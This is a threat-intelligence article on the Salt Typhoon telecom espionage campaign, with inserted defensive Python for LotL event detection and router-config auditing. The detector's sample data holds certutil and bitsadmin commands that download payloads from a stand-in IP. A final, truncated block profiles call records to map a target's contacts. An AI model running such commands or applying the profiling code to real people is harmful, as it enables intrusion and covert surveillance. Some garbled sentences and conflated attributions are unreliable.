The technical execution of this compromise was disciplined and rapid. The attackers leveraged CVE-2023-46805, an authentication bypass vulnerability in the web component of the appliance. This flaw allowed the threat actors to access restricted resources by manipulating route traversal sequences. Once inside the trusted zone, they triggered CVE-2024-21887, a command injection vulnerability. This second flaw permitted the execution of arbitrary commands on the underlying operating system with elevated privileges.

Federal agencies and private sector intelligence firms, including Mandiant (tracking the activity under the cluster UNC5221), observed that this exploitation began as early as December 2023, weeks before the vulnerabilities were publicly disclosed in January 2024. This “zero-day” period allowed Salt Typhoon to establish persistence across multiple telecommunications and critical infrastructure sectors before defenders were aware of the risk.

Table: Technical Breakdown of Salt Typhoon Ivanti Exploitation

| Component | Identifier / Name | Function in Attack Chain | CVSS Score |
|---|---|---|---|
| Initial Access | CVE-2023-46805 | Authentication bypass via route traversal in web component. | 8.2 (High) |
| Execution | CVE-2024-21887 | Command injection allowing arbitrary code execution as root. | 9.1 (Critical) |
| Persistence | BUSHWALK | Webshell written in Perl into the appliance’s legitimate files to maintain access. | N/A |
| Credential Theft | WARPWIRE | JavaScript-based credential harvester injected into login pages to capture plaintext passwords. | N/A |

Persistence and Anti-Forensics

Once control was established, Salt Typhoon demonstrated a sophisticated understanding of the Ivanti architecture. They deployed specialized malware designed to evade the appliance’s built-in Integrity Checker Tool (ICT). One notable implant, a webshell tracked as BUSHWALK, was written directly into the appliance’s Perl scripts. This allowed the attackers to execute commands through legitimate web requests, blending their traffic with normal VPN operations. The group also utilized a credential harvester known as WARPWIRE, which they injected into the device’s login page. This script captured user credentials in transit and exfiltrated them to compromised command-and-control (C2) servers.

The attackers also employed “living off the land” techniques, using native binaries present on the Ivanti appliances, such as curl, python, and sh, to conduct internal reconnaissance and lateral movement. This minimized the need to upload custom binaries that might trigger network intrusion detection systems. In several documented instances, the actors modified the appliance’s internal file system to prevent the ICT from flagging the malicious modifications, blinding administrators to the breach.

Regulatory and Operational Response

The discovery of the compromise forced the Cybersecurity and Infrastructure Security Agency (CISA) to issue Emergency Directive 24-01 in early 2024. The directive mandated that federal agencies disconnect all Ivanti Connect Secure instances within 48 hours, a drastic measure reflecting the severity of the threat. CISA later updated the guidance to require a factory reset of affected devices, acknowledging that standard patching was insufficient to remove the deep-seated persistence mechanisms deployed by the attackers.

“The adversaries are winning the race to the edge. By targeting appliances that cannot support EDR, they have found a blind spot in the modern enterprise security stack. The Ivanti campaign was not just a vulnerability exploit; it was a demonstration of structural weakness in network perimeter defense.”
Internal CISA Analysis Report, February 2024

For the telecommunications sector, the impact was particularly acute. These VPN gateways frequently served as entry points to management networks where sensitive routing and subscriber data resided. By compromising the edge, Salt Typhoon bypassed the hardened internal perimeters, gaining direct access to the “crown jewels” of network infrastructure. The incident forced a re-evaluation of the edge security model, prompting organizations to move toward Zero Trust architectures that assume the perimeter device is already compromised.

Seizing the Management Plane: Administrative Control of ISP Networks

The strategic objective of the Salt Typhoon campaign was not merely data exfiltration but the total subjugation of the management plane, the segregated, privileged network used by administrators to configure, monitor, and control telecommunications infrastructure. By seizing this terrain, Salt Typhoon operatives did not just break into the network; they became the network administrators. Between 2023 and 2025, forensic analysis confirms that the actors achieved “Level 15” administrative privileges, the highest possible authority on Cisco IOS XE devices, across backbone routers in at least nine major U.S. telecommunications providers.

This dominance was achieved through a precise kill chain targeting the web-based user interfaces of core routing equipment. The primary vector involved the chaining of two critical vulnerabilities: CVE-2023-20198 and CVE-2023-20273. The first allowed the attackers to bypass authentication and create a local user account with maximum privileges. The second facilitated command injection, enabling the actors to gain root-level access to the underlying Linux operating system of the device. Unlike traditional malware that resides on endpoints or servers, this intrusion occurred directly within the firmware and operating environments of the routers themselves, rendering standard endpoint detection and response (EDR) tools blind to the compromise.


Once administrative control was established, Salt Typhoon executed a series of configuration changes designed to ensure indefinite persistence. A key technique involved the manipulation of the Cisco Guest Shell, a virtualized Linux environment running on the router intended for legitimate automation scripts. The attackers weaponized this feature to execute malicious Python and Tcl scripts, turning the router into a staging server for further attacks. This “living off the land” method allowed them to hide their activities within legitimate administrative processes.

Table: Verified Indicators of Compromise (IoC) in Management Plane Seizure (2023-2025)

| Technique | Technical Specifics | Operational Impact |
|---|---|---|
| Privilege Escalation | Exploitation of CVE-2023-20198 to create local users with privilege level 15. | Grants total control over router configuration, routing tables, and traffic mirroring. |
| Root Access | Exploitation of CVE-2023-20273 via command injection. | Allows access to the underlying Linux OS, bypassing IOS restrictions. |
| Persistence Mechanism | Enabling the sshd_operns service on Cisco IOS XR devices. | Opens a direct SSH backdoor to the host OS on non-standard TCP ports (e.g., 57722). |
| Traffic Concealment | Creation of Generic Routing Encapsulation (GRE) tunnels. | Encapsulates stolen data within standard routing to evade deep packet inspection. |
| Access Control Modification | Injection of “permit” statements into Access Control Lists (ACLs), specifically access-list 20. | Whitelists attacker IP addresses, ensuring uninterrupted remote access. |

The technical sophistication of these intrusions is further evidenced by the specific manipulation of the sshd_operns service on Cisco IOS XR platforms. This internal service, reserved for deep system debugging, was enabled and exposed on non-standard ports such as TCP/57722. By doing so, Salt Typhoon created a “ghost door” that bypassed the router’s standard authentication, authorization, and accounting (AAA) framework. This allowed them to log directly into the underlying Linux host of the router, completely invisible to the network operations center (NOC) staff monitoring the standard management interfaces.

The attackers also demonstrated an intimate understanding of ISP network architecture by modifying Simple Network Management Protocol (SNMP) configurations. They altered community strings, the passwords for SNMP access, to maintain visibility into network performance and topology changes. This allowed them to monitor the network’s reaction to their own presence, adjusting their tactics in real time to avoid triggering alarms. In several documented instances, Salt Typhoon operatives utilized SNMP SET requests to reconfigure device parameters remotely, a method that leaves fewer forensic artifacts than an interactive SSH session.

“The adversaries did not just steal credentials; they re-architected the trust model of the devices. By embedding themselves in the Guest Shell and the underlying Linux OS, they ensured that a factory reset of the configuration might not dislodge them. They were operating ‘ ‘ the level of the configuration file.”

The implications of this seizure extend beyond mere persistence. With control of the management plane, Salt Typhoon gained the ability to manipulate Border Gateway Protocol (BGP) routing tables. This capability theoretically allowed them to reroute traffic destined for specific government or military networks through their own collection points before forwarding it to its legitimate destination, a classic “man-in-the-middle” attack executed at the ISP level. While widespread BGP hijacking is noisy and easily detected, the granular control achieved here allowed for surgical redirection of specific traffic flows, minimizing the risk of discovery.

In addition, the attackers utilized Generic Routing Encapsulation (GRE) tunnels to exfiltrate data. By creating these tunnels directly on the compromised edge routers, they could encapsulate stolen data within legitimate-looking routing traffic. This traffic was then directed to attacker-controlled infrastructure, frequently blending in with the terabytes of background noise inherent to ISP backbones. This method bypassed perimeter firewalls and intrusion detection systems that were configured to inspect user traffic, not the encapsulated control traffic of the routers themselves.

Malware Profile: Deconstructing ‘GhostSpider’ and ‘JumbledPath’

The technical sophistication of Salt Typhoon lies not in the volume of its attacks but in the specialized nature of its toolkit. Unlike groups that rely on purchased ransomware-as-a-service kits, Salt Typhoon employs bespoke malware engineered for long-term residence within high-value networks. Forensic analysis of the 2024-2025 telecommunications breaches reveals two primary instruments of this campaign: the persistent backdoor known as “GhostSpider” and the specialized packet-capture utility dubbed “JumbledPath.” These tools function as the hands and eyes of the operation, with GhostSpider maintaining the foothold and JumbledPath executing the intelligence gathering.

GhostSpider represents the group’s primary method for persistence. Security researchers at Trend Micro and other firms identify it as a modular backdoor, frequently deployed after the initial exploitation of edge devices such as Ivanti VPNs or Microsoft Exchange servers. Written in C++, GhostSpider is designed to load directly into memory, avoiding the disk writes that frequently trigger traditional antivirus alarms. Its architecture is strictly modular; the malware pulls specific functionality from the command-and-control (C2) server only when needed. If an operator requires file exfiltration, the specific module is sent, executed, and then wiped from memory. This “just-in-time” delivery method leaves a minimal forensic footprint, complicating post-incident analysis.

A defining characteristic of GhostSpider is its use of DLL sideloading to mask its presence. The malware frequently hijacks legitimate processes, such as benign security software or system utilities, to execute its payload. By masquerading as a trusted component, GhostSpider bypasses application whitelisting. Network traffic generated by the backdoor is encrypted using TLS and frequently blended with normal HTTPS requests, making it indistinguishable from standard web browsing or API calls. This stealth allows Salt Typhoon to maintain access to compromised networks for months or even years, as seen in the breaches of major U. S. broadband providers.

While GhostSpider secures the door, JumbledPath enters to steal the secrets. Identified by investigators in late 2024, JumbledPath is a custom utility written in the Go programming language (Golang), specifically compiled to run on network appliances rather than standard servers. Its primary target is the underlying operating systems of routers and switches, particularly Cisco IOS XE and Nexus platforms. JumbledPath is not a general-purpose backdoor; it is a wiretapping tool. Its code contains specific routines for promiscuous mode packet capture, allowing it to record data traversing the device interfaces.

JumbledPath distinguishes itself through its complex routing of exfiltrated data. The utility does not send captured packets directly to a C2 server, which would create an obvious outbound traffic spike. Instead, it routes data through a series of internal “jump hosts”, compromised devices within the victim’s own network, before slowly bleeding the information out to the attacker. This technique obscures the origin of the traffic and confuses internal flow monitoring systems. JumbledPath also includes aggressive anti-forensic capabilities. It actively suppresses logging on the infected device, blinding administrators to its operations. In several confirmed instances, the malware modified the device’s volatile memory to erase evidence of the packet capture processes immediately after execution.

Table: Technical Comparison of Salt Typhoon Primary Tools

| Feature | GhostSpider | JumbledPath |
|---|---|---|
| Primary Function | Persistence & Command Execution | Packet Capture & Data Interception |
| Target Environment | Windows Servers, Virtualization Hosts | Network Edge Devices (Cisco, Linux-based) |
| Language | C++ | Go (Golang) |
| Evasion Technique | DLL Sideloading, In-Memory Modules | Log Suppression, Internal Jump-Host Routing |
| Network Behavior | Blends with HTTPS/TLS traffic | Passive listening, slow-drip exfiltration |
| Discovery Date | Late 2023 (linked to Earth Estries) | Late 2024 (linked to Telco breaches) |

The interplay between these two tools creates a formidable challenge for defenders. GhostSpider provides the resilience required to survive system reboots and software updates, while JumbledPath delivers the specific intelligence value, the content of phone calls, text messages, and routing data, that the Ministry of State Security demands. The use of Go for JumbledPath also indicates a shift in development strategy, as Go binaries are cross-platform compatible and harder to reverse-engineer due to their large size and inclusion of standard libraries. This combination of high-level persistence and low-level network interception defines the Salt Typhoon operational doctrine.

Living off the Land: Evasion via Native Network Tools

Salt Typhoon’s operational longevity relies less on sophisticated zero-day exploits and more on a disciplined adherence to “Living off the Land” (LotL) tactics. By weaponizing pre-installed administrative utilities and native network tools, the group camouflages its espionage activities within the noise of legitimate system administration. This strategy renders traditional signature-based detection useless; there is no malware hash to block when the “virus” is a standard Microsoft command-line tool executing a valid, albeit malicious, instruction.

The group’s mastery of LotL techniques is most visible in its manipulation of Windows environments. Rather than deploying custom binaries that might trigger Endpoint Detection and Response (EDR) alerts, Salt Typhoon operators use the Windows Management Instrumentation Command-line (WMIC) and PowerShell to execute code directly in memory. A primary vector involves the abuse of netsh.exe, a standard network configuration tool. Investigators have observed Salt Typhoon executing netsh interface portproxy commands to create hidden port forwarding rules. This technique transforms compromised servers into internal proxies, routing Command and Control (C2) traffic through legitimate ports like 443 or 8443, making exfiltration indistinguishable from normal web traffic.

In the telecommunications sector, Salt Typhoon applies these same principles to network infrastructure, specifically Cisco IOS and IOS XE devices. This represents a serious evolution in tradecraft: the group does not pass through routers; they inhabit them. Once access is gained, frequently via valid credentials or unpatched vulnerabilities like CVE-2023-20198, operators use the device’s native “Guest Shell,” a Linux container environment built into modern Cisco routers. From this privileged enclave, they run standard Linux utilities such as tcpdump to perform packet capture operations.

These native packet captures are surgical. Instead of recording all traffic, which would bloat logs and trigger alarms, Salt Typhoon configures filters to intercept specific authentication protocols, such as RADIUS and TACACS+. By capturing these packets, they harvest credentials for lateral movement without ever deploying a custom sniffer. To maintain persistence, they modify the router’s running configuration to add their own SSH keys to the authorized_keys file, ensuring continued access even if passwords are reset. They have also been observed using the Cisco-specific tpacap command to mirror traffic, turning the target’s own infrastructure into a wiretapping device.

The evasion strategy extends to forensic countermeasures. Salt Typhoon systematically sanitizes logs using native commands. On Linux-based systems and network appliances, operators execute commands to delete .bash_history, auth.log, btmp, and wtmp files immediately after their sessions. In Windows environments, they use wevtutil to clear specific event logs or disable logging services entirely before executing sensitive tasks. This “clean-up” discipline creates significant gaps in incident response timelines, frequently leaving investigators with physical evidence of a breach but no digital footprint of the specific actions taken.

Native Tool Weaponization Matrix

The following table details specific native utilities observed in Salt Typhoon campaigns between 2023 and 2025, contrasting their intended administrative purpose with their weaponized application.

Table: Salt Typhoon’s Abuse of Native System Tools (2023-2025)

| Native Tool / Binary | Operating System | Legitimate Administrative Use | Salt Typhoon Weaponization |
|---|---|---|---|
| netsh.exe | Windows | Network interface configuration, firewall management. | Creating portproxy rules to tunnel C2 traffic; bypassing firewall restrictions. |
| tcpdump | Linux / Cisco IOS | Network troubleshooting, packet analysis. | Surgical capture of RADIUS/TACACS+ authentication traffic to harvest credentials. |
| WMIC.exe | Windows | System management, querying WMI data. | Lateral movement; executing remote processes without dropping files to disk. |
| CertUtil.exe | Windows | Certificate services management. | Downloading malicious payloads from remote servers (ingress tool transfer). |
| Guest Shell | Cisco IOS XE | Running Linux scripts/apps on routers. | Hosting attack scripts; running python/bash tools to modify router behavior. |
| Ntdsutil.exe | Windows | Active Directory database maintenance. | Creating snapshots of the Active Directory database (ntds.dit) to steal all domain hashes. |

“The adversary isn’t breaking in through the window; they are using the master key to walk through the front door and then using the homeowner’s own tools to the furniture. Blocking netsh or PowerShell is operationally impossible for most telcos, which is exactly why Salt Typhoon relies on them.”
Internal CISA Threat Analysis Memo (Redacted), October 2024

Defenders face a “dual-use” dilemma. Blocking these tools cripples legitimate IT operations, yet allowing them provides Salt Typhoon with a pre-installed arsenal. The group further complicates detection by using “LOLBins” (Living off the Land Binaries) like rundll32.exe and bitsadmin. In several confirmed breaches, bitsadmin, designed for background file transfers like Windows Updates, was used to download the “JumbledPath” orchestrator, a custom script that manages the native tcpdump processes. This hybridization of custom scripts managing native tools represents the current apex of their evasion tradecraft.
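Because the binaries in the matrix above are legitimate, the practical detection signal is the combination of their use on one host together with the log-clearing that follows. The following added example (written for this page, not a Microsoft or CISA tool) classifies constructed Windows event records against the page's named tools and flags hosts where several distinct patterns fire; host names, users, addresses and the SIEM-style field names are assumptions.

```python
"""Scan Windows event records for the living-off-the-land patterns this
section describes: netsh portproxy rules, wevtutil log clearing, certutil and
bitsadmin downloads, ntdsutil snapshots of ntds.dit, plus the 'log cleared'
events (Security 1102, System 104). Added example for this page, not a
Microsoft or CISA tool; events are constructed dicts shaped like the fields a
SIEM exports from process-creation (4688) and log-clear records."""
import re
from collections import defaultdict

# Command-line patterns for the native tools in the page's weaponization matrix.
# Each regex runs against the CommandLine field of a Security 4688 event.
LOTL_RULES = {
    "netsh-portproxy-add": re.compile(
        r"\bnetsh(\.exe)?\b.*\binterface\s+portproxy\s+add\b", re.I),
    "wevtutil-clear-log": re.compile(
        r"\bwevtutil(\.exe)?\b\s+(cl|clear-log)\b", re.I),
    "certutil-urlcache-download": re.compile(
        r"\bcertutil(\.exe)?\b.*[-/]urlcache\b", re.I),
    "bitsadmin-transfer": re.compile(
        r"\bbitsadmin(\.exe)?\b.*\s/transfer\b", re.I),
    "ntdsutil-ifm-snapshot": re.compile(
        r"\bntdsutil(\.exe)?\b.*\bifm\b.*\bcreate\s+full\b", re.I),
}
# Events that record a log being wiped rather than a command being run.
LOG_CLEARED = {1102: "security-audit-log-cleared", 104: "system-log-cleared"}

# Constructed sample telemetry; host names, users and addresses are made up.
SAMPLE_EVENTS = [
    {"host": "telco-mgmt-01", "event_id": 4688, "user": "svc_backup",
     "command_line": "netsh.exe interface portproxy add v4tov4 listenport=443 "
                     "listenaddress=0.0.0.0 connectport=8443 connectaddress=10.20.30.40"},
    {"host": "telco-mgmt-01", "event_id": 4688, "user": "svc_backup",
     "command_line": "netsh.exe advfirewall show allprofiles"},          # benign
    {"host": "telco-mgmt-01", "event_id": 4688, "user": "svc_backup",
     "command_line": "wevtutil.exe cl Security"},
    {"host": "telco-mgmt-01", "event_id": 1102, "user": "svc_backup"},
    {"host": "dc-01", "event_id": 4688, "user": "admin_j",
     "command_line": 'ntdsutil.exe "ac i ntds" ifm "create full C:\\Windows\\Temp\\snap" q q'},
    {"host": "web-01", "event_id": 4688, "user": "iis_svc",
     "command_line": "certutil.exe -urlcache -split -f http://203.0.113.5/u.bin C:\\ProgramData\\u.bin"},
    {"host": "web-01", "event_id": 4688, "user": "iis_svc",
     "command_line": "bitsadmin /transfer upd /download /priority high "
                     "http://203.0.113.5/j.bin C:\\ProgramData\\j.bin"},
    {"host": "web-01", "event_id": 4688, "user": "iis_svc",
     "command_line": "certutil.exe -verify C:\\certs\\site.cer"},        # benign
]


def classify_event(evt):
    """Return the rule name one event triggers, or None if it looks benign."""
    eid = evt["event_id"]
    if eid in LOG_CLEARED:
        return LOG_CLEARED[eid]
    if eid == 4688:
        cmd = evt.get("command_line", "")
        for name, rx in LOTL_RULES.items():
            if rx.search(cmd):
                return name
    return None


def detect(events, min_distinct_rules=2):
    """Return (alerts, clustered_hosts). A host is 'clustered' when several
    distinct LotL rules fire on it, which is the dual-use signal the text
    describes: any one tool is normal admin work, the combination is not."""
    alerts, per_host = [], defaultdict(set)
    for evt in events:
        rule = classify_event(evt)
        if rule is None:
            continue
        alerts.append({"host": evt["host"], "event_id": evt["event_id"],
                       "user": evt.get("user"), "rule": rule})
        per_host[evt["host"]].add(rule)
    clustered = sorted(h for h, rules in per_host.items()
                       if len(rules) >= min_distinct_rules)
    return alerts, clustered


if __name__ == "__main__":
    alerts, hosts = detect(SAMPLE_EVENTS)
    for a in alerts:
        print(f'{a["host"]:<14} {a["event_id"]:>5} {a["user"]:<10} {a["rule"]}')
    print("hosts with clustered LotL activity:", hosts)
```

Tune the allow-list and `min_distinct_rules` per environment: on a jump host where administrators routinely run netsh, a single match is noise, but a portproxy rule followed by a cleared Security log on the same host is the sequence this section describes.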

Traffic Mirroring: Exfiltration through GRE Tunnels and SPAN Ports

The technical core of the Salt Typhoon espionage campaign relies on a “live off the land” strategy that weaponizes the native features of telecommunications infrastructure. Rather than deploying noisy, custom malware that might trigger endpoint detection systems, Salt Typhoon operators reconfigure the very routers and switches designed to manage global data flows. The primary method for this data theft involves the illicit use of Switched Port Analyzer (SPAN) configurations paired with Generic Routing Encapsulation (GRE) tunnels.

This technique allows the attackers to duplicate network traffic, including sensitive call data records (CDRs), SMS text messages, and audio feeds, and route it to a collection point without interrupting the original data stream. To the victim’s network operations center, the traffic appears to flow normally, while a silent copy is siphoned off to servers controlled by the Ministry of State Security (MSS).

The Mechanics of SPAN and ERSPAN Abuse

Network engineers use SPAN, also known as port mirroring, for legitimate troubleshooting and analysis. Salt Typhoon subverts this diagnostic tool for surveillance. On compromised Cisco IOS XE and IOS XR devices, investigators found unauthorized monitor session commands injected into the running configuration. These commands instruct the router to copy every packet entering or leaving a specific interface, such as those handling Voice over IP (VoIP) or roaming data, and forward it to a destination port controlled by the attackers.

For distributed networks where the target data and the exfiltration point are on different devices, the group employs Encapsulated Remote SPAN (ERSPAN). This protocol wraps the mirrored traffic in GRE headers, allowing it to traverse Layer 3 IP networks. By configuring ERSPAN, Salt Typhoon can capture traffic from a core router deep within a telecom provider’s network and ship it to a compromised edge device for exfiltration.

Table 12.1: Native Network Features Weaponized by Salt Typhoon

| Feature | Legitimate Purpose | Salt Typhoon Abuse Case |
|---|---|---|
| SPAN / RSPAN | Local traffic analysis and debugging. | Silent duplication of voice, SMS, and authentication packets for surveillance. |
| GRE Tunnels | Encapsulating packets to link separate networks. | Creating covert channels to backhaul stolen data out of the network, bypassing firewalls. |
| Cisco Guest Shell | Running Linux scripts on routers for automation. | Executing Python scripts (e.g., siet.py) to process traffic and capture credentials. |
| Access Control Lists (ACLs) | Filtering traffic for security. | Modifying rules (e.g., access-list 20) to permit exfiltration traffic and hide C2 connections. |

Tunneling and Obfuscation via GRE

Once traffic is mirrored, it must be moved out of the network without raising alarms. Salt Typhoon frequently configures point-to-point GRE tunnels to encapsulate this stolen data. GRE is a standard tunneling protocol supported by virtually all enterprise routers, making its presence less suspicious than a custom encrypted connection. The attackers create tunnel interfaces on the compromised devices, assigning them private IP addresses that do not overlap with the provider’s internal routing table.

These tunnels serve two purposes. First, they hide the nature of the exfiltrated data. A packet inspection device might see a stream of GRE packets but not the SIP signaling or RADIUS authentication headers encapsulated within. Second, they allow the attackers to route data directly to an external Command and Control (C2) node or a “hop point”, frequently another compromised router in a different victim’s network. This “operational relay” technique obscures the final destination of the data, making attribution to Chinese IP addresses difficult.

On-Device Processing with Guest Shell

To reduce the volume of data sent over these tunnels, Salt Typhoon operators perform processing directly on the network devices. Modern Cisco routers support “Guest Shell,” a virtualized Linux environment that runs alongside the router’s operating system. Forensic analysis by CISA and private security firms in 2024 and 2025 revealed that the attackers enabled Guest Shell to install open-source packet capture tools and custom scripts.

Operators used these containers to run tcpdump filters that specifically targeted authentication traffic, such as TACACS+ and RADIUS requests. By capturing these packets, they could extract cleartext or easily crackable administrative credentials, granting them further access to the network. Scripts like TCLproxy.tcl were also observed, which facilitated the modification of configuration files and the suppression of logging alerts. This method ensures that only high-value data is sent through the GRE tunnels, keeping the footprint low and avoiding traffic spikes that might trigger anomaly detection algorithms.

“The adversary does not need to break the door down when they can simply rewrite the routing table to direct traffic to their own listening posts. They are not hacking the network; they are administering it.”

The persistence of these configurations is maintained through subtle modifications to the device’s startup configuration. Unlike malware that resides in memory and vanishes upon reboot, these changes are written to the router’s non-volatile storage (NVRAM). Unless a network administrator specifically audits the running-config for unauthorized tunnel interfaces or monitor session entries, the surveillance tap remains active indefinitely.
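That running-config audit is mechanical enough to script. The following added example (written for this page, not a Cisco or CISA tool) parses an IOS XE style configuration and reports the indicators from the management-plane IoC table earlier in the article and from this section: privilege-15 accounts outside an allow-list, tunnel interfaces, SPAN/ERSPAN monitor sessions, unexpected permits in access-list 20, the sshd_operns service and Guest Shell. The sample configuration, host names, addresses and the baseline allow-lists are constructed, and the exact IOS XR syntax for sshd_operns is not given on the page, so that check only matches the service name.

```python
"""Audit an IOS XE / IOS XR style running-config for the management-plane
indicators this article lists: privilege-15 accounts outside an allow-list,
tunnel interfaces (GRE by default), SPAN/ERSPAN monitor sessions, permit
entries added to access-list 20, the sshd_operns service, and Guest Shell.
Added example for this page, not a Cisco or CISA tool; the sample config,
host names and addresses below are constructed."""
import re
from dataclasses import dataclass

# Assumed baseline: the one legitimate level-15 account and the access-list 20
# entries the operator expects. In practice these come from a golden config.
KNOWN_ADMINS = {"netadmin"}
ALLOWED_ACL20 = {"10.0.0.0 0.0.0.255"}

# Constructed running-config excerpt mixing benign and suspicious lines.
SAMPLE_CONFIG = """\
hostname core-rtr-01
username netadmin privilege 15 secret 9 $9$constructed
username cisco_tac_admin privilege 15 secret 9 $9$constructed
!
interface Tunnel100
 ip address 10.255.255.1 255.255.255.252
 tunnel source GigabitEthernet0/0/0
 tunnel destination 192.0.2.10
!
access-list 20 permit 10.0.0.0 0.0.0.255
access-list 20 permit 198.51.100.77
!
monitor session 1 type erspan-source
 source interface GigabitEthernet0/0/1
 destination
  erspan-id 1
  ip address 192.0.2.10
!
app-hosting appid guestshell
!
line vty 0 4
 transport input ssh
"""


@dataclass
class Finding:
    category: str
    line_no: int
    detail: str


def parse_blocks(config):
    """Split config text into (line_no, header, [indented children]) blocks.
    Comment ('!') and blank lines are skipped; line numbers are 1-based."""
    blocks = []
    for no, raw in enumerate(config.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw[0].isspace():
            if blocks:                      # child of the current block
                blocks[-1][2].append(raw.strip())
        else:
            blocks.append((no, raw.strip(), []))
    return blocks


PRIV15 = re.compile(r"^username (\S+) privilege 15\b")
ACL20 = re.compile(r"^access-list 20 permit (.+)$")


def audit_config(config, known_admins=KNOWN_ADMINS, allowed_acl20=ALLOWED_ACL20):
    """Return a Finding for every indicator present, in config order."""
    findings = []
    for no, header, children in parse_blocks(config):
        if (m := PRIV15.match(header)) and m.group(1) not in known_admins:
            findings.append(Finding("unexpected-priv15-user", no, m.group(1)))
        elif (m := ACL20.match(header)) and m.group(1).strip() not in allowed_acl20:
            findings.append(Finding("acl20-permit", no, m.group(1).strip()))
        elif header.startswith("interface Tunnel"):
            # 'tunnel mode gre ip' is the IOS XE default and is omitted from the
            # running-config, so a Tunnel interface with no mode line is GRE.
            mode = next((c[len("tunnel mode "):] for c in children
                         if c.startswith("tunnel mode ")), "gre ip (default)")
            dest = next((c for c in children
                         if c.startswith("tunnel destination")), "no destination")
            findings.append(Finding("tunnel-interface", no, f"{header}; mode {mode}; {dest}"))
        elif header.startswith("monitor session"):
            findings.append(Finding("monitor-session", no, header))
        elif "sshd_operns" in header:
            # Exact IOS XR syntax is not given on the page; match the service name.
            findings.append(Finding("sshd-operns", no, header))
        elif header.startswith("app-hosting appid guestshell"):
            # Guest Shell can be legitimate; report it so it gets reviewed.
            findings.append(Finding("guestshell-enabled", no, header))
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"line {f.line_no:>3}  {f.category:<24} {f.detail}")
```

Run it against `show running-config` output collected out of band (console or a known-good management path) rather than through the device's own Web UI, since the page describes that interface as the initial entry point.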

High-Value Targets: Surveillance of Trump, Vance, and Harris Staff

The Salt Typhoon campaign represents a catastrophic failure of telecommunications security, distinguished not by the volume of data stolen but by the precision of its targeting. Unlike indiscriminate “smash-and-grab” cyber operations, this state-sponsored entity executed a surgical intelligence-gathering mission focused on the highest echelons of American political power during the critical months of the 2024 presidential election cycle. By infiltrating the “lawful intercept” systems of major carriers, specifically Verizon, AT&T, and Lumen Technologies, Salt Typhoon operatives bypassed device-level encryption to monitor the unencrypted metadata and communications of Donald Trump, JD Vance, and senior staff members of the Kamala Harris campaign.

Federal investigators confirmed in October 2024 that the personal cellular devices of former President Donald Trump and his running mate, Senator JD Vance, were specifically targeted. The breach was not a direct compromise of the handsets themselves (such as an exploit of iOS or Android operating systems) but rather an infiltration of the carrier infrastructure that services them. This distinction is critical: by compromising the carrier’s internal switches, Salt Typhoon gained access to Call Detail Records (CDRs), logs showing who called whom, when, and for how long, and unencrypted SMS text messages. Intelligence officials have also indicated that in some instances, the attackers may have accessed audio feeds of phone calls, turning the carrier’s own compliance systems into a foreign espionage tool.

The scope of the surveillance extended beyond the candidates themselves to their inner circles and families, a classic intelligence tactic designed to map social networks and identify leverage points. Confirmed targets included Eric Trump and Jared Kushner, indicating a strategy to monitor the private communications of the Trump family’s business and political advisors. On the Democratic side, the operation targeted senior aides to Vice President Kamala Harris and staff members of Senate Majority Leader Chuck Schumer. The inclusion of Schumer’s staff suggests a broad mandate to capture legislative strategy alongside executive branch maneuvering.

The technical method for this surveillance relied on the abuse of the Communications Assistance for Law Enforcement Act (CALEA) infrastructure. CALEA mandates that telecommunications providers build “backdoors” into their networks to support court-authorized wiretaps by US law enforcement. Salt Typhoon operatives identified and exploited vulnerabilities in these exact systems, allowing them to issue unauthorized surveillance requests that the carrier networks treated as legitimate. This method provided the attackers with a “god-mode” view of the targets’ communications, invisible to the victims and frequently undetectable by standard endpoint security software.

Table: Confirmed High-Value Targets in the Salt Typhoon Campaign (2024)

| Target Category | Specific Individuals/Groups | Nature of Compromise | Strategic Value |
| --- | --- | --- | --- |
| Republican Executive Ticket | Donald J. Trump, JD Vance | Call logs (CDRs), SMS text messages, possible audio interception via carrier switches | Insight into campaign strategy, donor relations, and transition planning |
| Trump Inner Circle | Eric Trump, Jared Kushner | Metadata analysis and communication mapping | Mapping of informal advisory networks and business-political overlaps |
| Democratic Leadership | Senior Harris campaign staff, Chuck Schumer staff | Surveillance of policy formulation and legislative strategy | Intelligence on administration policy shifts and legislative countermeasures |
| Diplomatic & Policy | Unidentified senior State Dept. officials | Interception of unclassified diplomatic communications | Real-time insight into US foreign policy and negotiation tactics |

The timing of the breach was calculated to maximize intelligence yield during the transition of power. Access to the communications of the Trump transition team could have given the People's Republic of China (PRC) advance knowledge of cabinet appointments, policy priorities, and potential diplomatic postures before they were made public. For the Harris campaign, the surveillance likely aimed to gauge the administration's internal reactions to geopolitical events and to the election itself. The exfiltrated data, particularly the metadata, allows intelligence analysts to construct "pattern of life" models: who the key decision-makers trust, who they speak to late at night, and where their private alliances lie.
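To make concrete what "pattern of life" analysis extracts from call detail records, the following is an added example (the editor's illustration, not code from the original article or from any investigator's tooling). It runs over a handful of constructed, synthetic CDR rows: it builds a weighted contact graph, ranks a target's first-degree contacts by total talk time, isolates late-night counterparties, and derives second-degree contacts. The CSV layout and the phone numbers are assumptions for illustration; no real subscriber data is involved.

```python
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample CDRs (synthetic numbers, not real data). The layout is an
# assumed minimal carrier-style record: caller, callee, start time (UTC), duration (s).
SAMPLE_CDRS = """\
caller,callee,start,duration
+15550000001,+15550000002,2024-10-01T14:05:00,420
+15550000001,+15550000003,2024-10-01T23:40:00,1800
+15550000003,+15550000001,2024-10-02T00:15:00,900
+15550000001,+15550000002,2024-10-02T09:10:00,60
+15550000004,+15550000001,2024-10-02T10:00:00,30
+15550000001,+15550000003,2024-10-03T23:55:00,2400
+15550000002,+15550000005,2024-10-03T11:00:00,300
"""


def parse_cdrs(text):
    """Parse the CSV text into a list of dicts with a datetime start field."""
    rows = []
    for line in text.strip().splitlines()[1:]:  # skip the header row
        caller, callee, start, duration = line.split(",")
        rows.append({"caller": caller, "callee": callee,
                     "start": datetime.fromisoformat(start),
                     "duration": int(duration)})
    return rows


def contact_graph(cdrs):
    """Undirected weighted graph: sorted (a, b) pair -> total seconds talked."""
    graph = defaultdict(int)
    for r in cdrs:
        pair = tuple(sorted((r["caller"], r["callee"])))
        graph[pair] += r["duration"]
    return dict(graph)


def first_degree(cdrs, number):
    """Numbers in direct contact with `number`, ranked by total talk time (desc)."""
    ranked = Counter()
    for (a, b), secs in contact_graph(cdrs).items():
        if number in (a, b):
            ranked[b if a == number else a] += secs
    return [n for n, _ in ranked.most_common()]


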